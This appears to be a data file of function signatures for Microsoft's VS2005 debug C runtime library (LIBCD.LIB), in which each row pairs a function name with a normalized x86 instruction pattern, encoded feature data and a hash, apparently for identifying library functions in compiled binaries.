+___init_monetary,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",MnKRwU+LzAoAAAAA/MSgqk+LzAoAAAAArHcGzi8CckL8xKCqLwJyQjJykcFkZ4bkh1hVuDZjfuesdwbONmN+50+LzAoAAAAAZGeG5E+LzAoAAAAAT4vMCgAAAAAAAAAA,[],5281ebc9ae1fc522d39603f61069d553f2dc794e,VS2005,LIBCD.LIB
+__ismbclower,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,CONST\nSETE R8",DczAAU+LzAoAAAAA9CnuCKA3OqEAAAAAUmd/BpZz8F9CIgNLmdT0gGs/0wQNzMABQiIDS5Zz8F/0Ke4IlnPwX6A3OqEAAAAAT4vMCgAAAAAAAAAAoDc6oU+LzAoAAAAASsDrlhxZ/uSZ1PSADczAAU+LzAoAAAAAHFn+5E+LzAoAAAAAaz/TBFJnfwYNzMAB,[],5c7fa06aed777b449cd21fad33f1d118a603180b,VS2005,LIBCD.LIB
+__cabs,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",BZ+jpQAAAAAAAAAA,NOKHfjTih34OlelMlF/LsukEnxE04od+jaAebLao+b+r4RkDNOKHfnBLJNjpBJ8RDpXpTNbmDAuchlE4OcyRgcESPOjtfinbtqj5v5Rdu2J+SSEYnIZRONbmDAs04od+NOKHfpRfy7IOlelMfkkhGKeHa3wAAAAA6QSfES+iRdUAAAAAlzApUTTih37BqdBGlF27YhsGJSZwSyTY7X4p2y+iRdUAAAAADpXpTNbmDAuchlE4p4drfBsGJSZwSyTYiw0UTDnMkYGTd1WtnIZROJRfy7LW5gwL1uYMCy+iRdUAAAAAwRI86C+iRdUAAAAAcEsk2C+iRdUAAAAAcEsk2C+iRdUAAAAAk3dVrS+iRdUAAAAAwanQRo2gHmw04od+QEd5Pi+iRdUAAAAAjaAebI2gHmw8p9TqL6JF1QAAAAAAAAAAGwYlJosNFExAR3k+PKfU6rao+b+r4RkDq+EZA5Rdu2J+SSEY,5fc128403a3d2037f3a66d331454f9c63c0ec9b0,VS2005,LIBCD.LIB
+__hypot,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",BZ+jpQAAAAAAAAAA,NOKHfnBLJNjpBJ8RDpXpTNbmDAuchlE4OcyRgcESPOjtfinbq+EZA5Rdu2J+SSEYtqj5v5Rdu2J+SSEYnIZRONbmDAs04od+NOKHfpRfy7IOlelMfkkhGKeHa3wAAAAA6QSfES+iRdUAAAAAlzApUTTih37BqdBGlF27YhsGJSZwSyTY7X4p2y+iRdUAAAAADpXpTNbmDAuchlE4p4drfBsGJSZwSyTYQEd5Pi+iRdUAAAAAiw0UTDnMkYGTd1WtnIZROJRfy7LW5gwL1uYMCy+iRdUAAAAAwRI86C+iRdUAAAAAcEsk2C+iRdUAAAAAcEsk2C+iRdUAAAAAwanQRo2gHmw04od+jaAebI2gHmw8p9TqL6JF1QAAAAAAAAAAGwYlJosNFExAR3k+k3dVrS+iRdUAAAAANOKHfjTih34OlelMlF/LsukEnxE04od+jaAebLao+b+r4RkDPKfU6rao+b+r4RkD,49aee02f87046883ea85ecc2249f5d195d8dbd52,VS2005,LIBCD.LIB
+__getstream,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]",UqVqhJyGUThNJfkBG3yOHl6jgyeuSOGh7ois/pyGUThNJfkBotU0ru6IrP4AAAAAXqODJ5yGUTgAAAAANRZyE1KlaoQAAAAABRtKv16jgycAAAAAnIZRONUc1LZ3BeVr1RzUtgAAAAAAAAAATSX5AQUbSr8bfI4edwXlawAAAAAAAAAAXqODJzUWchMAAAAArkjhoZyGUTgAAAAA,[],1356f48050807172fede150025d8e06900389c8c,VS2005,LIBCD.LIB
+__mbsnbcpy,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",K+FWcJqdjYoElgzt1MBcfMv+kp0r4VZwBJYM7X0JSDQAAAAADTmJ130JSDQAAAAAy/6SnTUWchNeo4Mnmp2Nil6jgycElgztNXKDC2nNBgB2ZN6YXqODJ30JSDQAAAAANRZyE2nNBgAAAAAAfQlINNUc1LYNOYnX1RzUtgAAAAAAAAAAac0GAH0JSDTUwFx8T4vMCgAAAAAAAAAAdmTemE+LzAoAAAAABJYM7X0JSDQAAAAAXqODJzUWchMAAAAA,[],78750a3d333b143c7e18c4b4cb17456e8dbc674f,VS2005,LIBCD.LIB
+__input,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",Ebtt1bL0GYj5n7MmJ9V/SosNFEychlE4KIdjECfVf0o8GUKdQWOlkIsNFExRvNIOGfBc+IsNFEwAAAAAYGZvZ0e/TrAAAAAAmsyi2YsNFEychlE4lx5AdIdZaR1SzprrNL7alIsNFEwAAAAAdYMGr5yGUTichlE45FK8n5yGUTichlE4nIZROJW5GXsN058Wcf7B6AAAAAAAAAAAPsqG2YsNFEwAAAAAnIZROORSvJ/b6hIUXnZ8GGfGyxwAAAAAXqODJ2fGyxwAAAAAnIZROJW5GXuchlE4o+eu44sNFEwAAAAAiw0UTDUWchMoh2MQiw0UTN3MNChednwYUbzSDj7KhtlYWEfUKIdjEF6jgyfGjzWEiw0UTIdZaR1pzQYANRZyE0e/TrAAAAAAUbzSDkFjpZDkHtog2+oSFORSvJ91gwavsvQZiIjQYWBO85L/xo81hDUWchNeo4Mn5B7aIIsNFEwAAAAATvOS/5rMotkoh2MQiw0UTIdZaR1SzprrKIdjEDwZQp0oh2MQUs6a6zUWchMAAAAA5FK8n5yGUTiDqvNHXqODJ4sNFEwAAAAANRZyExSSUkEAAAAAg6rzRxSSUkEAAAAAiw0UTEFF0BuchlE4PBlCnZrMotkAAAAAdYMGr5yGUTiDqvNHcf7B6AAAAAAAAAAAlbkZe4dZaR1pzQYAnIZROFIFTbKy9BmI+Z+zJpceQHTD1RhMiNBhYJrMotkoh2MQFJJSQYsNFEwkA8OdsvQZiFIFTbJVtVaSL2P39TwZQp2PZWwHwVNYFy9j9/XkHtogWFhH1IsNFEwAAAAA069j9uRSvJ/b6hIUVbVWki1GnW8AAAAAZ8bLHN3MNCheo4Mn5B7aIIsNFEwAAAAAJAPDnRnwXPg0vtqUac0GAOQe2iCHWWkdj2VsBzwZQp0AAAAAnIZROORSvJ/b6hIUUgVNsi1GnW8AAAAAh1lpHWBmb2dx/sHoh1lpHcFTWBdx/sHo2+oSFORSvJ91gwav3cw0KFG80g4Ru23VPBlCnaPnruMAAAAAR79OsLL0GYj5n7MmLUadb8Sg0gkAAAAADdOfFosNFEwAAAAAw9UYTIsNFEwAAAAAQUXQG8Sg0gkAAAAA5B7aIIsNFEwAAAAAxKDSCQAAAAAAAAAA,[],87375de9cf61cf8283fa8d0d1884ff2bd2b9b9cd,VS2005,LIBCD.LIB
+__spawnvpe,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",NRZyE5yGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE48+aPlpyGUThRXDRXsfbl8o0v/IgAAAAAO4+r5eRSvJ8AAAAAnIZROORSvJ+S9NEBkvTRAeRSvJ87j6vl3uDnfzUWchMkA8Odk90UgV6jgye8VTOIkvTRAeRSvJ87j6vlXqODJ5yGUTgAAAAAjS/8iDUWchNAPBIrQAz7yZyGUTgAAAAANRZyE/Pmj5YAAAAAUVw0V5yGUThisDXgO4+r5eRSvJ8AAAAA5FK8n5yGUTiDrkNeJAPDnTUWchN0wPhwnIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBYrA14G1JBQaT3RSB5FK8n+4docTe4Od/dMD4cDUWchM1dZFUkvTRAeRSvJ87j6vlQDwSK97g538AAAAAvFUziDUWchNeo4MnNXWRVDUWchMCzreONRZyE5yGUTgAAAAA3uDnf16jgyckA8OdO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2Nvk90UgV6jgyex9uXyO4+r5eRSvJ8AAAAA5FK8n4OuQ17uHaHEpBdjb+RSvJ+S9NEB7h2hxORSvJ+S9NEBnIZROLs9SYWPuGMmAs63jvPmj5Y1FnITJAPDnTUWchOT3RSBj7hjJrs9SYUAAAAAvFUziDUWchO8VTOIkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vluz1JhQAAAAAAAAAAsfbl8l6jgycAAAAAXqODJ40v/IgAAAAAbUkFBo0v/Iix9uXyk90UgbxVM4iT3RSB,[],efeb0d2fcd092ce89ed45d29cb0fb7b859236d46,VS2005,LIBCD.LIB
+__seterrormode,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",UmgoDwAAAAAAAAAA,[],760e58f24768fa9286db0e8191f50820a122e16a,VS2005,LIBCD.LIB
+__ismbcdigit,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",7PnuxUFF0BsAAAAADczAAU+LzAoAAAAA9CnuCKA3OqEAAAAAmdT0gGs/0wRmeTE1Umd/BpZz8F9CIgNLZnkxNU+LzAoAAAAAlnPwX6A3OqEAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAQiIDS5Zz8F/0Ke4ISsDrliQDw52Z1PSAoDc6oU+LzAoAAAAA9Bf+50FF0BsAAAAAJAPDnfQX/ufs+e7Faz/TBFJnfwYNzMAB,[],cd0b361fc33c7744f1d04a6156e0bc66b1c249b5,VS2005,LIBCD.LIB
+__ismbbpunct,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,lnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAA,8c6e617982ee531f9a82a635ff0452667faa2c3e,VS2005,LIBCD.LIB
+__ismbbkpunct,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4,1c1395c6a70c24861cd49ad5f32eaa0daa057bd7,VS2005,LIBCD.LIB
+__ismbbalpha,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",rvSL1wAAAAAAAAAA,nIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9c,8d48f031797e8c048f8059c38f1830e6f65f106f,VS2005,LIBCD.LIB
+__ismbbkana,"PUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",MJJdppZz8F9suzpabLs6WpZz8F/0Ke4I1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAA9CnuCNUc1LYAAAAA,[],4dbe67dcaf0ecc549ab907050a48144fa813272c,VS2005,LIBCD.LIB
+__ismbbkalnum,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA,9f975c7d7c454ed26dc2c61844f32086cc55021f,VS2005,LIBCD.LIB
+__ismbbtrail,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,lnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAA,40f17a4b69abc2449a58d1c165ea205543802941,VS2005,LIBCD.LIB
+__ismbbgraph,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",rvSL1wAAAAAAAAAA,lnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAA,cb75b790f327ae69bc16ec6df3e724ed99801c67,VS2005,LIBCD.LIB
+__ismbbkprint,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA,23e98a9807c886bdf2d881887ce6f5c750bec4bf,VS2005,LIBCD.LIB
+__ismbbprint,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",rvSL1wAAAAAAAAAA,lnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAA,60b6519368d192b2b2fe10fd3fcbeac35f2d7262,VS2005,LIBCD.LIB
+__ismbbalnum,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",rvSL1wAAAAAAAAAA,q253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4II/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAA,9ddb11d67231d0bb2aff7a4fd3727ddde32a40ce,VS2005,LIBCD.LIB
+__ismbblead,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,I/5fXJyGUTgAAAAA9CnuCNUc1LYAAAAAlnPwX9Uc1LYAAAAA1RzUtgAAAAAAAAAAlnPwX5yGUTgAAAAAq253+ZZz8F+chlE4nIZROJZz8F8j/l9cnIZROJZz8F/0Ke4I,305378ec11e1a86d06b9d6380bd6e50c5f3719db,VS2005,LIBCD.LIB
+_memcmp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nOR R32,R32\nAND CONST2,CONST\nJCC CONST",cug6RVndh3Z24CM8duAjPCqzQt6X2nuUOGUVblNxUkvoVaval9p7lD/DesXYzQSm2M0EpiqzQt6X2nuUl9p7lD/DesUhrHjtIax47SqzQt6HR1I/6FWr2n7U+jGyxNEzssTRM0TTo21794Xwh0dSPz/DesUAAAAAP8N6xQAAAAAAAAAAftT6MUTTo20k65G/JOuRv0TTo20vGjTcLxo03H7U+jFZ3Yd2Wd2HdgGhdbMAAAAAAaF1swAAAAAAAAAAU3FSS3LoOkXGozfIxqM3yHLoOkXrqEL466hC+CqzQt7YzQSm2M0EpiqzQt5MYWxWTGFsViqzQt6ymcise/eF8Fndh3Z+1PoxspnIrCqzQt4AAAAAKrNC3kTTo20AAAAARNOjbQAAAAAAAAAAFjgIIgGhdbM4ZRVu,[],6410a2abc766d3336fda73cdd0daa166addc85b1,VS2005,LIBCD.LIB
+__write,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,R32\nCMP DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",p+t+UWxmG5zOL0RefUKLKwA2ejAAAAAAzi9EXl6jgydeo4MnZnkxNU+LzAoAAAAAADZ6MKfrflHsdoa7BmKIw6/bSbFeYGP8bUkFBoMRrFwNzMABDczAAU+LzAoAAAAAJsB64ZyGUTgAAAAAgxGsXE+LzAoAAAAAtHkePOikXWgGYojDKwlhuMdJJXTv/n7SXmBj/F/TCZK5iudC7al6OpyGUTgAAAAABmKIw31KucXopF1ouZa2nE+LzAoAAAAAnIZROLmWtpychlE4XqODJ16jgycAAAAAr9tJsV/TCZK5iudCnIZROAZiiMOchlE4xJKmaE+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROJ+/4/nAh6/47/5+0sdJJXQAAAAA7HaGu6frflErCWG4wIev+MSSpmgAAAAA6KRdaE+LzAoAAAAAXqODJzUWchMAAAAAbGYbnF6jgycAAAAAGT3Rg16jgyd9Qosrn7/j+cSSpmgAAAAAuYrnQhk90YMAAAAANRZyExk90YMAAAAAXqODJ5yGUTgAAAAAX9MJku2pejomwHrhBmKIw4MRrFxtSQUGfUq5xQZiiMNmeTE1x0kldAA2ejAAAAAA,[],8ed59d176c3100a6a6232dc1b686e5884b267057,VS2005,LIBCD.LIB
+__wspawnvp,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",yCGT8gAAAAAAAAAA,O4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElkvTRAeRSvJ87j6vlISBBJeRSvJ+S9NEB6H4nTMnm2P/ofidMCPrYRORSvJ+S9NEBAs63jvPmj5Y1FnITkvTRAeRSvJ87j6vlJAPDnTUWchPofidM6H4nTF6jgyfJ5tj/uc59Rl6jgydAPBIrkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAAyebY/zUWchPJ5tj/jS/8iF6jgydAPBIr6H4nTI0v/Ii5zn1GNRZyE5yGUTgAAAAA5FK8nyEgQSWchlE45FK8n5yGUTiDrkNeO4+r5eRSvJ8AAAAA8+aPlpyGUTjUaxYdnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nwj62ETe4Od/5FK8n4OuQ14I+thEyebY/zUWchNeo4MnkvTRAeRSvJ87j6vl3uDnfzUWchMkA8OdXqODJ5yGUTgAAAAANRZyE/Pmj5YAAAAAXqODJ5yGUTgAAAAAnIZROLs9SYWPuGMmQDwSK97g538AAAAAQAz7yZyGUTgAAAAA3uDnf16jgyckA8Od1GsWHZyGUTiqsMfMO4+r5eRSvJ8AAAAAuz1JhQAAAAAAAAAAnIZROORSvJ+S9NEBj7hjJrs9SYUAAAAAJAPDnTUWchN0wPhwg65DXuRSvJ+S9NEBkvTRAeRSvJ87j6vlqrDHzI0v/IjofidMdMD4cDUWchM1dZFUNXWRVDUWchMCzreO,300effbe9e8d6bd80d7fcc98436b02b9f2a59c8c,VS2005,LIBCD.LIB
+__getws,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",uz1JhQAAAAAAAAAAXqODJwIcXxUAAAAAnIZROORSvJ+S9NEB50yCajwbxdUAAAAAdYMGr5yGUTg8G8XV5FK8n5yGUTg8G8XViw0UTOdMgmqDrkNekvTRAeRSvJ91gwavPBvF1QIcXxWLDRRMcgYNJORSvJ+S9NEBg65DXl6jgyf0Ke4I9CnuCLs9SYUAAAAAAhxfFbs9SYUAAAAA,[],54f109ed8925a46bd1551f14868229599f6c43c7,VS2005,LIBCD.LIB
+___lconv_init,"PUSH EBP\nMOV EBP,ESP\nMOV BYTE PTR DS:[CONST],CONST\nMOV BYTE PTR DS:[CONST],CONST\nMOV BYTE PTR DS:[CONST],CONST\nMOV BYTE PTR DS:[CONST],CONST\nMOV BYTE PTR DS:[CONST],CONST\nMOV BYTE PTR DS:[CONST],CONST",cLLQZgAAAAAAAAAA,[],28e665aac00f849e894d5de9315f1721044c9616,VS2005,LIBCD.LIB
+__wexecvp,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",HoIHagAAAAAAAAAA,kvTRAeRSvJ91gwavyebY/yEgQSVeo4MndMD4cDUWchMhIEEl02vy2szBSeeYw8s2ISBBJTV1kVTJ5tj/ISBBJZyGUTiIQh8MdYMGr5yGUTghIEEl5FK8n5yGUTghIEElmMPLNiEgQSUAAAAA5FK8n4OuQ14I+thE6H4nTMzBSefTa/LaCPrYRORSvJ+S9NEBjS/8iF6jgydAPBIruc59Rl6jgydAPBIrQDwSKx8Y6EEAAAAAkvTRAeRSvJ91gwavdYMGr5yGUTiDrkNedYMGryEgQSWchlE4NXWRVDe217g1FnITnIZROJFuf7x8Ye+FiEIfDCEgQSWchlE4dYMGr4OuQ14I+thEHxjoQSEgQSXofidMfGHvhQAAAAAAAAAAISBBJeRSvJ+S9NEBXqODJ5yGUTgAAAAAzMFJ540v/IjofidMyebY/yEgQSXJ5tj/kW5/vAAAAAAAAAAANRZyE5yGUTgAAAAA5FK8nyEgQSWchlE4N7bXuCEgQSU1FnITnIZROORSvJ+S9NEBdYMGrwj62EQfGOhB5FK8nwj62EQfGOhBkvTRAeRSvJ91gwavHxjoQTUWchN0wPhwyebY/zUWchM1dZFU6H4nTMnm2P/ofidMkvTRAeRSvJ91gwav7xfqreRSvJ+S9NEBXqODJ5yGUTgAAAAA6H4nTF6jgyfJ5tj/6H4nTI0v/Ii5zn1GNRZyE5yGUTgAAAAA5FK8n5yGUTiDrkNedMD4cDUWchN0wPhwnIZROORSvJ+S9NEBISBBJczBSefofidMg65DXuRSvJ+S9NEBkvTRAeRSvJ91gwav,b3a16544dd4f831ed14d1ecca7f80f682daa8748,VS2005,LIBCD.LIB
+__wfindnexti64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",Hhi6OS+iRdUAAAAAMhSYrR4Yujlx/sHorCn9MBMI/pgyFJitL6JF1QAAAAAAAAAAEwj+mAAAAAAAAAAAcf7B6AAAAAAAAAAA,[],fa53e2c64f43a93148e88a7ea433a1a0844da015,VS2005,LIBCD.LIB
+__wfindfirsti64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",MhSYrYPygRlx/sHorydXXC+iRdUAAAAAL6JF1QAAAAAAAAAA6KkcrC+iRdUAAAAAcf7B6AAAAAAAAAAAkXOYtuipHKwyFJitg/KBGa8nV1wAAAAA,[],1c974551124d2c625d3b2d3580d8b407ee4bd834,VS2005,LIBCD.LIB
+__ui64tow,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",FU2CKQAAAAAAAAAA,H5EwagAAAAAAAAAA,9db2f581bc015396f689b45957cf59bb27465c8d,VS2005,LIBCD.LIB
+__ltow,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",vmvNDAAAAAAAAAAA,9CnuCCOMlIAAAAAAjLRRTpZz8F+chlE4lnPwXyOMlIAAAAAAnIZROJZz8F/0Ke4II4yUgAAAAAAAAAAA,db08e9699ede0aac6603e4049c7c1fbc1a4af4e2,VS2005,LIBCD.LIB
+__i64tow,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",FU2CKQAAAAAAAAAA,jLRRTpZz8F+chlE4lnPwX9umBfYAAAAA26YF9gAAAAAAAAAAnIZROJZz8F8hh3ljIYd5Y/Qp7gichlE4nIZROJZz8F/0Ke4I9CnuCNumBfYAAAAA,9db2f581bc015396f689b45957cf59bb27465c8d,VS2005,LIBCD.LIB
+__itow,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",vmvNDAAAAAAAAAAA,hYQKXtiy05kAAAAA2LLTmQAAAAAAAAAAF2vYoQAAAAAAAAAAcMiU5Bdr2KGchlE4nIZROBdr2KGFhApe,9f52de2d6f6273686fda609d913e08ad423898c1,VS2005,LIBCD.LIB
+__ultow,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",vmvNDAAAAAAAAAAA,owBRUQAAAAAAAAAA,db08e9699ede0aac6603e4049c7c1fbc1a4af4e2,VS2005,LIBCD.LIB
+_ceil,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",nIZROIbL2O+chlE4R8k3yw6V6UztfinbIvL6AE+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROC+Eexleo4Mn3iSCKSLy+gCchlE4L4R7GU+LzAoAAAAA7X4p20+LzAoAAAAAXqODJyLy+gAAAAAAhsvY70+LzAoAAAAAy0daakfJN8veJIIp7X4p20+LzAoAAAAADpXpTKt5mALtfinbq3mYAk+LzAoAAAAA,[],4f34ad3118245ec25ead905fff44b55aca058b45,VS2005,LIBCD.LIB
+__wctime,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",/iJHfE+LzAoAAAAAJu7hZU+LzAoAAAAAR+79Vibu4WX+Ikd8T4vMCgAAAAAAAAAA,[],a540133998bc342f2ac6bb9fa318888f37c115ce,VS2005,LIBCD.LIB
+__mbsdup,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",Noi2zibu4WVAPBIrQDwSK0+LzAoAAAAAjLRRTjaIts4NzMABJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAA,[],f693bf0d707fee44a6825e8c65ae92966d7014b5,VS2005,LIBCD.LIB
